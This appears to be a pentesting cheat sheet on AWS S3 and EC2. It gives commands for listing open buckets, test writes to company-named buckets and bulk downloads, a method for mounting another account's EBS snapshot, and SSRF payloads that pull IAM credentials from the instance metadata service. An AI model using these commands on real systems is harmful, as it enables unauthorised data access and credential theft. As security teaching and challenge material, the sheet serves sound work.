AWS - Amazon S3 Buckets
- AWS Configuration
- Open Bucket
- Basic tests
- AWS - Extract Backup
- Bucket juicy data
Prerequisites: at a minimum you need awscli.
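A common way to install it, assuming a Debian-based system or an available pip:

```shell
# from the distribution packages (Debian/Ubuntu)
sudo apt install awscli

# or via pip
pip install awscli
```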
You can get your credentials at https://console.aws.amazon.com/iam/home?#/security_credential, but you need an AWS account; a free tier account is available at https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/
Then you can use --profile nameofprofile in your aws commands.
Alternatively you can use environment variables instead of creating a profile.
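A minimal sketch of both options; the profile name is from the text above, and the key values are the standard AWS placeholder examples:

```shell
# create a named profile (interactive prompts for keys and region)
aws configure --profile nameofprofile

# or export credentials as environment variables instead of creating a profile
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
export AWS_DEFAULT_REGION=us-east-1
```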
By default, Amazon S3 bucket URLs look like http://s3.amazonaws.com/[bucket_name]/ — you can browse open buckets if you know their names.
Their contents are also enumerable if listing is enabled.
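For instance, to check whether a bucket is publicly listable (`bucket_name` is a placeholder):

```shell
# unauthenticated listing via the CLI
aws s3 ls s3://bucket_name --no-sign-request

# or request the bucket URL directly; an XML object listing
# is returned when listing is enabled
curl http://s3.amazonaws.com/bucket_name/
```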
Alternatively, you can extract the name of the S3 bucket behind a website by requesting %C0 in the path: the resulting error message discloses the bucket name. (Trick from https://twitter.com/0xmdv/status/1065581916437585920)
You can identify the bucket's region with dig and nslookup.
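A sketch using the flaws.cloud challenge domain (the IP shown is illustrative; use whatever address dig returns). The reverse lookup resolves to a name that embeds the region:

```shell
# resolve the site to its S3 endpoint IP
dig +short flaws.cloud

# reverse-resolve that IP; the PTR record looks like
# s3-website-us-west-2.amazonaws.com, revealing the region (us-west-2)
nslookup 52.218.192.11
```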
Move a file into the bucket
```
$ aws s3 mv test.txt s3://hackerone.marketing
FAIL : "move failed: ./test.txt to s3://hackerone.marketing/test.txt A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied."

$ aws s3 mv test.txt s3://hackerone.files
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
```
Download everything
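With the CLI this is a single sync; the bucket name and region are placeholders, and --no-sign-request applies when no credentials are required:

```shell
# mirror the whole bucket into a local directory
aws s3 sync s3://bucket_name/ ./bucket-dump --no-sign-request --region us-west-2
```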
Check bucket disk size
Use the --no-sign-request flag for an unauthenticated check.
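A recursive listing with a summary reports the object count and total size (`bucket_name` is a placeholder):

```shell
aws s3 ls s3://bucket_name --recursive --human-readable --summarize --no-sign-request
```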
AWS - Extract Backup
```
$ aws --profile flaws sts get-caller-identity
"Account": "XXXX26262029",

$ aws --profile profile_name ec2 describe-snapshots
$ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
"SnapshotId": "snap-XXXX342abd1bdcb89",

# Create a volume using the snapshot
$ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-XXXX342abd1bdcb89

# In AWS Console -> EC2 -> launch a new Ubuntu instance and attach the volume
$ chmod 400 YOUR_KEY.pem
$ ssh -i YOUR_KEY.pem ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com

# Mount the volume
$ lsblk
$ sudo file -s /dev/xvda1
$ sudo mount /dev/xvda1 /mnt
```
Bucket juicy data
Amazon exposes an internal metadata service that every EC2 instance can query for information about its host. If you find an SSRF vulnerability in an application running on EC2, try requesting:
```
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
```

The security-credentials endpoint returns the AccessKeyID, SecretAccessKey, and Token for the role.
For example, through a proxy: http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
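Credentials recovered this way can be plugged into the CLI as environment variables; note that the session token is required for role credentials. The values below are placeholders for what the metadata endpoint returned:

```shell
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
export AWS_SESSION_TOKEN=TOKEN_FROM_METADATA_RESPONSE

# verify the stolen role identity
aws sts get-caller-identity
```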
References

- There's a Hole in 1,951 Amazon S3 Buckets - Rapid7, Willis - March 27, 2013
- AWS Basic test - Bug Bounty Survey
- flaws.cloud - Challenge based on AWS vulnerabilities - Scott Piper of Summit Route
- flaws2.cloud - Challenge based on AWS vulnerabilities - Scott Piper of Summit Route
- Guardzilla video camera hardcoded AWS credential - blackmarble.sh (~~0dayallday.org~~)
- AWS Penetration Testing Part 1. S3 Buckets - Virtue Security
- AWS Penetration Testing Part 2. S3, IAM, EC2 - Virtue Security
- A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2, 2019